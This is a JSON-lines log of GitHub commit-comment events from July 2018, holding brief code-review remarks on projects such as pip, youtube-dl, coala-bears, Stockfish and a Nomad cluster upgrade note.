{"id":"8000265391","type":"CommitCommentEvent","actor":{"login":"MatthiasScholz"},"repo":{"name":"MatthiasScholz/cos"},"payload":{"comment":{"id":29792622,"position":null,"line":null,"path":null,"commit_id":"dd9e417ba08e32d5d7b1945b3fbe4ea82ce6edb2","created_at":"2018-07-22T13:59:28Z","updated_at":"2018-07-22T13:59:28Z","author_association":"OWNER","body":"# AMI Upgrade Procedure\r\nRunning instances are not destroyed!\r\nOnly new instances in the Autoscaling group are making use of the new configured AMI\r\nIncreasing and then decrease the number of instances to get an upgrade of the instances\r\n-> THIS IS VERY NICE SINCE IT WILL ALLOW AN EASY CLUSTER UPGRADE !!! :)\r\n\r\n## Nomad\r\n### Preparation\r\nhttps://www.nomadproject.io/docs/commands/node/drain.html\r\n\r\n### Cleanup\r\nRemoved old nodes - Force Garbage Collection:\r\n` curl --request PUT http://cosms-nomad-ui-amoeba-1180030775.us-east-1.elb.amazonaws.com/v1/system/gc`\r\n\r\n# NOTE: Nomad Server\r\nIt did not work with just 1 server and then scaling up to 2 and back to 1! A new leader was not determined!\r\n"}},"created_at":"2018-07-22T13:59:28Z"}
{"id":"8000265779","type":"CommitCommentEvent","actor":{"login":"slowbeam"},"repo":{"name":"slowbeam/javascript-hide-and-seek-nyc-web-060418"},"payload":{"comment":{"id":29792623,"position":null,"line":null,"path":null,"commit_id":"ad2649fcd18ccee6210b6404817e820da1a1d859","created_at":"2018-07-22T13:59:47Z","updated_at":"2018-07-22T13:59:47Z","author_association":"OWNER","body":"Awesome"}},"created_at":"2018-07-22T13:59:47Z"}
{"id":"8000267545","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"nathan-fiscaletti/ipstackgeo-php"},"payload":{"comment":{"id":29792632,"position":14,"line":14,"path":"tests/GeoLookupTest.php","commit_id":"c4df456bde7be833ed02d5e6ce08610ff61b0ccc","created_at":"2018-07-22T14:00:53Z","updated_at":"2018-07-22T14:00:53Z","author_association":"NONE","body":"Is this a special key for the `GeoIP` service?\r\nI think it's not the proper way to expose this secret key on this line.\r\nTry to consider the [Travis encrypted environment variables](https://docs.travis-ci.com/user/environment-variables/#Defining-encrypted-variables-in-.travis.yml) :+1: ."}},"created_at":"2018-07-22T14:00:53Z"}
{"id":"8000270731","type":"CommitCommentEvent","actor":{"login":"msuchard"},"repo":{"name":"beast-dev/beast-mcmc"},"payload":{"comment":{"id":29792639,"position":null,"line":null,"path":null,"commit_id":"f444d454a765f5cba40e7c71c8d28d3946a6d88e","created_at":"2018-07-22T14:03:04Z","updated_at":"2018-07-22T14:03:04Z","author_association":"MEMBER","body":"@xji3 -- I think we'd like the opposite behavior.   If `locationObject instanceof Parameter` then it should be casted to a `BranchSpecificFixedEffects.None`"}},"created_at":"2018-07-22T14:03:04Z"}
{"id":"8000271569","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29792643,"position":null,"line":null,"path":null,"commit_id":"6906609217aef12ca477daa8a92fc1f737dfdc77","created_at":"2018-07-22T14:03:41Z","updated_at":"2018-07-22T14:03:41Z","author_association":"OWNER","body":"### ----------------------------- Detekt Issues ☠️ -----------------------------\n- [LongParameterList - 9/7 - [myFunc]](https://github.com/tarek360/emptyapp/blob/6906609217aef12ca477daa8a92fc1f737dfdc77/KotlinPresenter.kt#L18)\n- [EmptyWhenBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/6906609217aef12ca477daa8a92fc1f737dfdc77/KotlinPresenter.kt#L31)\n- [EmptyIfBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/6906609217aef12ca477daa8a92fc1f737dfdc77/KotlinPresenter.kt#L20)\n- [EmptyIfBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/6906609217aef12ca477daa8a92fc1f737dfdc77/KotlinPresenter.kt#L22)\n- [EmptyIfBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/6906609217aef12ca477daa8a92fc1f737dfdc77/KotlinPresenter.kt#L24)\n- [EmptyElseBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/6906609217aef12ca477daa8a92fc1f737dfdc77/KotlinPresenter.kt#L26)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/6906609217aef12ca477daa8a92fc1f737dfdc77/Factory.kt#L9)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/6906609217aef12ca477daa8a92fc1f737dfdc77/Factory.kt#L11)\n- [MagicNumber - [num]](https://github.com/tarek360/emptyapp/blob/6906609217aef12ca477daa8a92fc1f737dfdc77/KotlinPresenter.kt#L16)\n- [MagicNumber - [myFunc]](https://github.com/tarek360/emptyapp/blob/6906609217aef12ca477daa8a92fc1f737dfdc77/KotlinPresenter.kt#L22)\n- [MagicNumber - [myFunc]](https://github.com/tarek360/emptyapp/blob/6906609217aef12ca477daa8a92fc1f737dfdc77/KotlinPresenter.kt#L24)\n- [MagicNumber - [myFunc]](https://github.com/tarek360/emptyapp/blob/6906609217aef12ca477daa8a92fc1f737dfdc77/KotlinPresenter.kt#L36)\n- [MagicNumber - [createPresenter]](https://github.com/tarek360/emptyapp/blob/6906609217aef12ca477daa8a92fc1f737dfdc77/Factory.kt#L11)\n- [MagicNumber - [x]](https://github.com/tarek360/emptyapp/blob/6906609217aef12ca477daa8a92fc1f737dfdc77/GithubCommitCommenter.kt#L16)\n"}},"created_at":"2018-07-22T14:03:41Z"}
{"id":"8000271925","type":"CommitCommentEvent","actor":{"login":"pradyunsg"},"repo":{"name":"pypa/pep517"},"payload":{"comment":{"id":29792644,"position":13,"line":121,"path":"pep517/wrappers.py","commit_id":"6261bd944d6c414b6b37b92c1a414bf15bee0ed7","created_at":"2018-07-22T14:03:51Z","updated_at":"2018-07-22T14:03:51Z","author_association":"MEMBER","body":"Ah. That makes sense to me. :)"}},"created_at":"2018-07-22T14:03:51Z"}
{"id":"8000273275","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29792648,"position":null,"line":null,"path":null,"commit_id":"2ceab84dd15646e03229615fea58b55cb242ec8d","created_at":"2018-07-22T14:04:48Z","updated_at":"2018-07-22T14:04:48Z","author_association":"OWNER","body":"### ----------------------------- Detekt Issues ☠️ -----------------------------\n- [LongParameterList - 9/7 - [myFunc]](https://github.com/tarek360/emptyapp/blob/2ceab84dd15646e03229615fea58b55cb242ec8d/KotlinPresenter.kt#L18)\n- [EmptyWhenBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/2ceab84dd15646e03229615fea58b55cb242ec8d/KotlinPresenter.kt#L31)\n- [EmptyElseBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/2ceab84dd15646e03229615fea58b55cb242ec8d/KotlinPresenter.kt#L26)\n- [EmptyIfBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/2ceab84dd15646e03229615fea58b55cb242ec8d/KotlinPresenter.kt#L20)\n- [EmptyIfBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/2ceab84dd15646e03229615fea58b55cb242ec8d/KotlinPresenter.kt#L22)\n- [EmptyIfBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/2ceab84dd15646e03229615fea58b55cb242ec8d/KotlinPresenter.kt#L24)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/2ceab84dd15646e03229615fea58b55cb242ec8d/Factory.kt#L9)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/2ceab84dd15646e03229615fea58b55cb242ec8d/Factory.kt#L11)\n- [MagicNumber - [num]](https://github.com/tarek360/emptyapp/blob/2ceab84dd15646e03229615fea58b55cb242ec8d/KotlinPresenter.kt#L16)\n- [MagicNumber - [myFunc]](https://github.com/tarek360/emptyapp/blob/2ceab84dd15646e03229615fea58b55cb242ec8d/KotlinPresenter.kt#L22)\n- [MagicNumber - [myFunc]](https://github.com/tarek360/emptyapp/blob/2ceab84dd15646e03229615fea58b55cb242ec8d/KotlinPresenter.kt#L24)\n- [MagicNumber - [myFunc]](https://github.com/tarek360/emptyapp/blob/2ceab84dd15646e03229615fea58b55cb242ec8d/KotlinPresenter.kt#L36)\n- [MagicNumber - [createPresenter]](https://github.com/tarek360/emptyapp/blob/2ceab84dd15646e03229615fea58b55cb242ec8d/Factory.kt#L11)\n- [MagicNumber - [x]](https://github.com/tarek360/emptyapp/blob/2ceab84dd15646e03229615fea58b55cb242ec8d/GithubCommitCommenter.kt#L16)\n"}},"created_at":"2018-07-22T14:04:48Z"}
{"id":"8000275523","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29792651,"position":24,"line":95,"path":"tests/vcs/git/GitCommitBearTest.py","commit_id":"c7d7654d71c44bcdc1fb29275aa59bf09e4535fc","created_at":"2018-07-22T14:06:19Z","updated_at":"2018-07-22T14:06:19Z","author_association":"NONE","body":"I think this isn't needed again"}},"created_at":"2018-07-22T14:06:19Z"}
{"id":"8000275994","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29792654,"position":21,"line":15,"path":"Lesson2/l2_task6_products.rb","commit_id":"f25c1f46d367a9fcf5b4057147171b3360870342","created_at":"2018-07-22T14:06:37Z","updated_at":"2018-07-22T14:06:37Z","author_association":"NONE","body":"расшифровка предыдущего комментария:\r\nметод `capitalize!` это \"бенг-метод\", у которого есть родственник `capitalize`\r\nв большинстве случаев отличие \"бенг-методов\" от \"обычных\" в том, что они мутируют, т.е. изменяют переменную \r\nесли написать \r\n```ruby\r\nvariable.capitalize\r\n```\r\nто значение в переменной не изменится\r\nдля изменения значения и его сохранения нужно написать либо \r\n```ruby\r\nvariable = variable.capitalize\r\n```\r\nлибо \r\n```ruby\r\nvariable.capitalize!\r\n```\r\nв любом из двух последних случаев в переменной `variable` сохранится уже новое значение, подвергшееся воздействию метода `capitalize`\r\n\r\nв текущем коде идет присвоение значения, полученного из терминала в переменную\r\nречь об изменении уже сохраненного значения не идет\r\nпоэтому достаточно \"обычного\" метода, восклицательный знак лучше убрать (как правило \"бенг-методы\" более ресурсозатратны, чем их \"обычные\" родственники)"}},"created_at":"2018-07-22T14:06:37Z"}
{"id":"8000276946","type":"CommitCommentEvent","actor":{"login":"TingPing"},"repo":{"name":"flathub/cx.ring.Ring"},"payload":{"comment":{"id":29792657,"position":null,"line":null,"path":null,"commit_id":"d978c1c3b9b08d898a06f3dc56a74ae5a2dfcd42","created_at":"2018-07-22T14:07:19Z","updated_at":"2018-07-22T14:07:19Z","author_association":"MEMBER","body":"Why did you break dconf and then start putting things on the host file system, so much about this is wrong.."}},"created_at":"2018-07-22T14:07:19Z"}
{"id":"8000279233","type":"CommitCommentEvent","actor":{"login":"burtbai"},"repo":{"name":"pypa/pip"},"payload":{"comment":{"id":29792660,"position":4,"line":10,"path":"NEWS.rst","commit_id":"43fe0c1e70ff25dd25f89f367ab9dfd82a728162","created_at":"2018-07-22T14:08:59Z","updated_at":"2018-07-22T14:08:59Z","author_association":"NONE","body":"should 18.0.0 ! https://semver.org"}},"created_at":"2018-07-22T14:08:59Z"}
{"id":"8000280102","type":"CommitCommentEvent","actor":{"login":"dstufft"},"repo":{"name":"pypa/pip"},"payload":{"comment":{"id":29792663,"position":4,"line":10,"path":"NEWS.rst","commit_id":"43fe0c1e70ff25dd25f89f367ab9dfd82a728162","created_at":"2018-07-22T14:09:35Z","updated_at":"2018-07-22T14:09:35Z","author_association":"MEMBER","body":"pip doesn't use SemVer."}},"created_at":"2018-07-22T14:09:35Z"}
{"id":"8000280314","type":"CommitCommentEvent","actor":{"login":"kngwyu"},"repo":{"name":"racer-rust/racer"},"payload":{"comment":{"id":29792664,"position":19,"line":30,"path":"README.md","commit_id":"e013374b4fed41c41b358e47a4f52370c44be560","created_at":"2018-07-22T14:09:43Z","updated_at":"2018-07-22T14:09:43Z","author_association":"COLLABORATOR","body":"Thanks!"}},"created_at":"2018-07-22T14:09:43Z"}
{"id":"8000281204","type":"CommitCommentEvent","actor":{"login":"mrfade"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":29792666,"position":360,"line":235,"path":"youtube_dl/extractor/puhutv.py","commit_id":"8fd2a7be373a29b9bea491f952f14315a90c2f3a","created_at":"2018-07-22T14:10:19Z","updated_at":"2018-07-22T14:10:19Z","author_association":"CONTRIBUTOR","body":"I haven't tested this but I don't think this line is correct. For example url is 'https://puhutv.com/darisi-basimiza-detay'. playlist_id is gonna be 'darisi-basimiza' and json url is gonna be 'https://puhutv.com/darisi-basimiza-detay/api/slug/darisi-basimiza-detay' then this url is not found. Am I right?"}},"created_at":"2018-07-22T14:10:19Z"}
{"id":"8000281493","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29792667,"position":6,"line":3,"path":"Lesson2/l2_task2_fill_array.rb","commit_id":"f25c1f46d367a9fcf5b4057147171b3360870342","created_at":"2018-07-22T14:10:31Z","updated_at":"2018-07-22T14:10:31Z","author_association":"NONE","body":"после запятой нужен пробел"}},"created_at":"2018-07-22T14:10:31Z"}
{"id":"8000282941","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":29792669,"position":360,"line":235,"path":"youtube_dl/extractor/puhutv.py","commit_id":"8fd2a7be373a29b9bea491f952f14315a90c2f3a","created_at":"2018-07-22T14:11:29Z","updated_at":"2018-07-22T14:11:29Z","author_association":"COLLABORATOR","body":"No, you're not."}},"created_at":"2018-07-22T14:11:29Z"}
{"id":"8000283387","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29792670,"position":56,"line":32,"path":"Lesson2/l2_task6_products.rb","commit_id":"f25c1f46d367a9fcf5b4057147171b3360870342","created_at":"2018-07-22T14:11:45Z","updated_at":"2018-07-22T14:11:45Z","author_association":"NONE","body":"здесь снова табы и код не с начала строки"}},"created_at":"2018-07-22T14:11:45Z"}
{"id":"8000283983","type":"CommitCommentEvent","actor":{"login":"rakr"},"repo":{"name":"rakr/vim-one"},"payload":{"comment":{"id":29792672,"position":null,"line":null,"path":null,"commit_id":"08aca1b5d8cd83106a430f150aa77b4148f6cd5e","created_at":"2018-07-22T14:12:08Z","updated_at":"2018-07-22T14:12:08Z","author_association":"OWNER","body":"Fix #81"}},"created_at":"2018-07-22T14:12:08Z"}
{"id":"8000285950","type":"CommitCommentEvent","actor":{"login":"dosowen"},"repo":{"name":"dosowen/reviews.py"},"payload":{"comment":{"id":29792677,"position":null,"line":null,"path":null,"commit_id":"aeb5dc15fab43d97a5166fcc7ad44d14ce40d9fb","created_at":"2018-07-22T14:13:28Z","updated_at":"2018-07-22T14:13:28Z","author_association":"OWNER","body":"WOW"}},"created_at":"2018-07-22T14:13:28Z"}
{"id":"8000286818","type":"CommitCommentEvent","actor":{"login":"mrfade"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":29792678,"position":null,"line":null,"path":null,"commit_id":"8fd2a7be373a29b9bea491f952f14315a90c2f3a","created_at":"2018-07-22T14:14:03Z","updated_at":"2018-07-22T14:14:03Z","author_association":"CONTRIBUTOR","body":"Thanks for the update! 👍 🔥 "}},"created_at":"2018-07-22T14:14:03Z"}
{"id":"8000287381","type":"CommitCommentEvent","actor":{"login":"Benchaqroun"},"repo":{"name":"Benchaqroun/FullstackReactCode"},"payload":{"comment":{"id":29792679,"position":null,"line":null,"path":null,"commit_id":"e8ea768b70c03e1906a4dcb7f9ee03382fcbdeec","created_at":"2018-07-22T14:14:26Z","updated_at":"2018-07-22T14:14:26Z","author_association":"OWNER","body":"Heroku deploy"}},"created_at":"2018-07-22T14:14:26Z"}
{"id":"8000290685","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29792689,"position":null,"line":null,"path":null,"commit_id":"6467541e5acf42acd33fed44fb234630bc885977","created_at":"2018-07-22T14:16:40Z","updated_at":"2018-07-22T14:16:40Z","author_association":"NONE","body":"Sorry, this is no longer only a tuning. There are 4 additional operations used. The compiler can reduce this with common sub expression elimination to two. so use [0,5]"}},"created_at":"2018-07-22T14:16:40Z"}
{"id":"8000291134","type":"CommitCommentEvent","actor":{"login":"pradyunsg"},"repo":{"name":"pypa/pip"},"payload":{"comment":{"id":29792690,"position":4,"line":10,"path":"NEWS.rst","commit_id":"43fe0c1e70ff25dd25f89f367ab9dfd82a728162","created_at":"2018-07-22T14:16:59Z","updated_at":"2018-07-22T14:16:59Z","author_association":"MEMBER","body":"And, just 6 lines below, it's explicitly stated which versioning scheme it uses."}},"created_at":"2018-07-22T14:16:59Z"}
{"id":"8000291214","type":"CommitCommentEvent","actor":{"login":"QuantumStatement"},"repo":{"name":"MrCrayfish/MrCrayfishFurnitureMod"},"payload":{"comment":{"id":29792691,"position":35,"line":47,"path":"src/main/java/com/mrcrayfish/furniture/blocks/BlockDesk.java","commit_id":"378f8d83028549c6bed8ef83a6629fabe9e64a38","created_at":"2018-07-22T14:17:02Z","updated_at":"2018-07-22T14:17:02Z","author_association":"CONTRIBUTOR","body":"I'm talking about \"Hold SHIFT for Info\" tooltip in string 47\r\nhttps://github.com/MrCrayfish/MrCrayfishFurnitureMod/blob/378f8d83028549c6bed8ef83a6629fabe9e64a38/src/main/java/com/mrcrayfish/furniture/blocks/BlockDesk.java#L47"}},"created_at":"2018-07-22T14:17:02Z"}
{"id":"8000292480","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29792692,"position":16,"line":16,"path":"tests/vcs/git/GitCommitMetadataBearTest.py","commit_id":"c7d7654d71c44bcdc1fb29275aa59bf09e4535fc","created_at":"2018-07-22T14:17:56Z","updated_at":"2018-07-22T14:17:56Z","author_association":"NONE","body":"I just realized that doing this also adds the testcase from `GitCommitBearTest` into this module.\r\nSo remove this, and replace all of the `GitCommitBearTest.run_git_command` with `run_shell_command`"}},"created_at":"2018-07-22T14:17:56Z"}
{"id":"8000293394","type":"CommitCommentEvent","actor":{"login":"tomasherceg"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29792694,"position":null,"line":null,"path":null,"commit_id":"085841fd233c7d1f10c11ced7244401a68df4f8c","created_at":"2018-07-22T14:18:35Z","updated_at":"2018-07-22T14:18:35Z","author_association":"CONTRIBUTOR","body":"Let's discuss this when you are in the office. "}},"created_at":"2018-07-22T14:18:35Z"}
{"id":"8000295627","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29792697,"position":null,"line":null,"path":null,"commit_id":"6467541e5acf42acd33fed44fb234630bc885977","created_at":"2018-07-22T14:20:10Z","updated_at":"2018-07-22T14:20:10Z","author_association":"OWNER","body":"@locutus2 I know, I just want to get some measure. If I run [0, 5], not enough games will be played."}},"created_at":"2018-07-22T14:20:10Z"}
{"id":"8000296361","type":"CommitCommentEvent","actor":{"login":"jralls"},"repo":{"name":"gramps-project/gramps"},"payload":{"comment":{"id":29792699,"position":null,"line":null,"path":null,"commit_id":"4211dbf9f51ab106de5a11f3b52aa82aa955c3d4","created_at":"2018-07-22T14:20:39Z","updated_at":"2018-07-22T14:20:39Z","author_association":"MEMBER","body":"@Nick-Hall Agreed, it just makes history look a little weird. Not enough of a reason to make everyone force-pull.\r\n"}},"created_at":"2018-07-22T14:20:39Z"}
{"id":"8000297030","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29792700,"position":null,"line":null,"path":null,"commit_id":"6467541e5acf42acd33fed44fb234630bc885977","created_at":"2018-07-22T14:21:05Z","updated_at":"2018-07-22T14:21:05Z","author_association":"OWNER","body":"\"For information only\""}},"created_at":"2018-07-22T14:21:05Z"}
{"id":"8000299136","type":"CommitCommentEvent","actor":{"login":"dychomon"},"repo":{"name":"dychomon/tietopythontraining-basic"},"payload":{"comment":{"id":29792702,"position":null,"line":null,"path":null,"commit_id":"ef8e81e792f9296f152d7669495194c943a24b56","created_at":"2018-07-22T14:22:30Z","updated_at":"2018-07-22T14:22:30Z","author_association":"OWNER","body":"@kuszcjan lesson_12"}},"created_at":"2018-07-22T14:22:30Z"}
{"id":"8000309034","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29792725,"position":72,"line":72,"path":"bears/vcs/VCSCommitMetadataBear.py","commit_id":"c7d7654d71c44bcdc1fb29275aa59bf09e4535fc","created_at":"2018-07-22T14:29:35Z","updated_at":"2018-07-22T14:29:35Z","author_association":"NONE","body":"I think we'd just want to get the HEAD commit SHA from here, rather than the commit message"}},"created_at":"2018-07-22T14:29:35Z"}
{"id":"8000310697","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29792731,"position":27,"line":27,"path":"bears/vcs/git/GitCommitMetadataBear.py","commit_id":"c7d7654d71c44bcdc1fb29275aa59bf09e4535fc","created_at":"2018-07-22T14:30:37Z","updated_at":"2018-07-22T14:30:37Z","author_association":"NONE","body":"Move this to `get_head_commit`"}},"created_at":"2018-07-22T14:30:37Z"}
{"id":"8000313725","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29792739,"position":84,"line":84,"path":"bears/vcs/VCSCommitMetadataBear.py","commit_id":"c7d7654d71c44bcdc1fb29275aa59bf09e4535fc","created_at":"2018-07-22T14:32:46Z","updated_at":"2018-07-22T14:32:46Z","author_association":"NONE","body":"Change this into \"The HEAD commit SHA\""}},"created_at":"2018-07-22T14:32:46Z"}
{"id":"8000313764","type":"CommitCommentEvent","actor":{"login":"vishnuk7"},"repo":{"name":"vishnuk7/Laravel-Blog"},"payload":{"comment":{"id":29792740,"position":null,"line":null,"path":null,"commit_id":"8edc2be9ef850a61fc96abbd4f145f8fd08b4e12","created_at":"2018-07-22T14:32:48Z","updated_at":"2018-07-22T14:32:48Z","author_association":"OWNER","body":"Many to Many"}},"created_at":"2018-07-22T14:32:48Z"}
{"id":"8000313875","type":"CommitCommentEvent","actor":{"login":"Sanitar777"},"repo":{"name":"MarlinFirmware/Marlin"},"payload":{"comment":{"id":29792741,"position":null,"line":null,"path":null,"commit_id":"2106fa26b19e1d3edc2b59bfd1504f7b4e87683a","created_at":"2018-07-22T14:32:52Z","updated_at":"2018-07-22T14:32:52Z","author_association":"NONE","body":"Sorry, but is missing one ')' here... in line number 272\r\nThanks for your work!\r\n\r\n "}},"created_at":"2018-07-22T14:32:52Z"}
{"id":"8000316954","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29792743,"position":24,"line":24,"path":"bears/vcs/git/GitCommitMetadataBear.py","commit_id":"c7d7654d71c44bcdc1fb29275aa59bf09e4535fc","created_at":"2018-07-22T14:34:59Z","updated_at":"2018-07-22T14:34:59Z","author_association":"NONE","body":"Get the `raw_commit_message` by using `'git log -1 --pretty=%B ' + head_commit`"}},"created_at":"2018-07-22T14:34:59Z"}
{"id":"8000317129","type":"CommitCommentEvent","actor":{"login":"ryotayama"},"repo":{"name":"ryotayama/Hayaemon_Web"},"payload":{"comment":{"id":29792744,"position":null,"line":null,"path":null,"commit_id":"d1df39f2f1c251ee86559b88029b42c3f368140f","created_at":"2018-07-22T14:35:07Z","updated_at":"2018-07-22T14:35:07Z","author_association":"OWNER","body":"対応しましたー₍₍ (ง*ᐛ)ว ⁾⁾"}},"created_at":"2018-07-22T14:35:07Z"}
{"id":"8000317803","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29792745,"position":76,"line":76,"path":"bears/vcs/VCSCommitMetadataBear.py","commit_id":"c7d7654d71c44bcdc1fb29275aa59bf09e4535fc","created_at":"2018-07-22T14:35:33Z","updated_at":"2018-07-22T14:35:33Z","author_association":"NONE","body":"We might also want to change this parameter to `head_commit_sha`"}},"created_at":"2018-07-22T14:35:33Z"}
{"id":"8000319725","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29792751,"position":121,"line":121,"path":"tests/vcs/git/GitCommitMetadataBearTest.py","commit_id":"c7d7654d71c44bcdc1fb29275aa59bf09e4535fc","created_at":"2018-07-22T14:36:54Z","updated_at":"2018-07-22T14:36:54Z","author_association":"NONE","body":"There's no commit in the master branch, that's why the merge can't be done, create a commit in the master branch first."}},"created_at":"2018-07-22T14:36:54Z"}
{"id":"8000319950","type":"CommitCommentEvent","actor":{"login":"Subv"},"repo":{"name":"B3n30/citra-1"},"payload":{"comment":{"id":29792752,"position":29,"line":216,"path":"src/core/hle/service/http_c.cpp","commit_id":"0606e7010c7789cabacb33050bcb6a170ad7773b","created_at":"2018-07-22T14:37:03Z","updated_at":"2018-07-22T14:37:03Z","author_association":"NONE","body":"you can use emplace_back(name, value);"}},"created_at":"2018-07-22T14:37:03Z"}
{"id":"8000322247","type":"CommitCommentEvent","actor":{"login":"Pudgy138"},"repo":{"name":"Pudgy138/test"},"payload":{"comment":{"id":29792754,"position":null,"line":null,"path":null,"commit_id":"2e0f9b1615aa9b77889a106cc5c1fc4f8f87e530","created_at":"2018-07-22T14:38:36Z","updated_at":"2018-07-22T14:38:36Z","author_association":"OWNER","body":"Following up: That worked and the app deployed."}},"created_at":"2018-07-22T14:38:36Z"}
{"id":"8000322291","type":"CommitCommentEvent","actor":{"login":"SMoZam"},"repo":{"name":"SMoZam/Ironhack-training"},"payload":{"comment":{"id":29792755,"position":null,"line":null,"path":null,"commit_id":"a50c524ba99030abc3db16bebfedebd4aef4593d","created_at":"2018-07-22T14:38:37Z","updated_at":"2018-07-22T14:38:37Z","author_association":"OWNER","body":"getting used to branchs"}},"created_at":"2018-07-22T14:38:37Z"}
{"id":"8000322579","type":"CommitCommentEvent","actor":{"login":"Subv"},"repo":{"name":"B3n30/citra-1"},"payload":{"comment":{"id":29792757,"position":9,"line":149,"path":"src/core/hle/service/http_c.h","commit_id":"8c3681004645b9c9712c30cd6ea13ace303a4056","created_at":"2018-07-22T14:38:49Z","updated_at":"2018-07-22T14:38:49Z","author_association":"NONE","body":"kernel"}},"created_at":"2018-07-22T14:38:49Z"}
{"id":"8000323736","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"torfranz/Stockfish"},"payload":{"comment":{"id":29792758,"position":null,"line":null,"path":null,"commit_id":"50d6cebe781419de63f72ae61c17cf7fceca1e93","created_at":"2018-07-22T14:39:37Z","updated_at":"2018-07-22T14:39:37Z","author_association":"NONE","body":"This was a strong elo gainer. The likelyhood to simplify this away (not only at STC but also LTC) is very small\r\nhttps://github.com/official-stockfish/Stockfish/commit/0a5b03af3f4291c11d1eb28bcfa607471ba81fd1"}},"created_at":"2018-07-22T14:39:37Z"}
{"id":"8000324859","type":"CommitCommentEvent","actor":{"login":"Lucchetto"},"repo":{"name":"RevengeOS/android_vendor_lineage"},"payload":{"comment":{"id":29792759,"position":null,"line":null,"path":null,"commit_id":"864181da726ab692735db6d77d584a0bf2ef5b16","created_at":"2018-07-22T14:40:23Z","updated_at":"2018-07-22T14:40:23Z","author_association":"MEMBER","body":"Thank you nerd\r\n"}},"created_at":"2018-07-22T14:40:23Z"}
{"id":"8000325085","type":"CommitCommentEvent","actor":{"login":"NuLogicSystems"},"repo":{"name":"TheAssassin/AppImageLauncher"},"payload":{"comment":{"id":29792760,"position":null,"line":null,"path":null,"commit_id":"c3e1b274c65f7ecf31e784cf1664d007dd9ff1a1","created_at":"2018-07-22T14:40:33Z","updated_at":"2018-07-22T14:40:33Z","author_association":"NONE","body":"Will do.\r\nIt was late on a Saturday night, and I was tired and ready for bed."}},"created_at":"2018-07-22T14:40:33Z"}
{"id":"8000333977","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/BlackJack"},"payload":{"comment":{"id":29792777,"position":6,"line":6,"path":"deck.rb","commit_id":"ad1062e222265356bd0efa76199aee6ac2cf3fe3","created_at":"2018-07-22T14:46:41Z","updated_at":"2018-07-22T14:46:41Z","author_association":"NONE","body":"здесь нет особого смысла использовать метод класса, особенно с учетом, что он у тебя вызывается только один раз в самом же классе )"}},"created_at":"2018-07-22T14:46:41Z"}
{"id":"8000334001","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/hol-light-qe"},"payload":{"comment":{"id":29792778,"position":null,"line":null,"path":null,"commit_id":"eedd8fb9beee6e911d029a413fb8ac81e48dc70c","created_at":"2018-07-22T14:46:42Z","updated_at":"2018-07-22T14:46:42Z","author_association":"OWNER","body":"Nice.\r\nI do think we should split those 4 checks in `BETA_REDUCE_EVAL` into individual checks with individual and more informative error messages."}},"created_at":"2018-07-22T14:46:42Z"}
{"id":"8000334494","type":"CommitCommentEvent","actor":{"login":"dtzWill"},"repo":{"name":"fgaz/nur-packages"},"payload":{"comment":{"id":29792779,"position":9,"line":20,"path":".travis.yml","commit_id":"0370edb4ef80587dcbded98fdd966f02476d0bfd","created_at":"2018-07-22T14:47:05Z","updated_at":"2018-07-22T14:47:05Z","author_association":"NONE","body":"did you mean `overlays` here?"}},"created_at":"2018-07-22T14:47:05Z"}
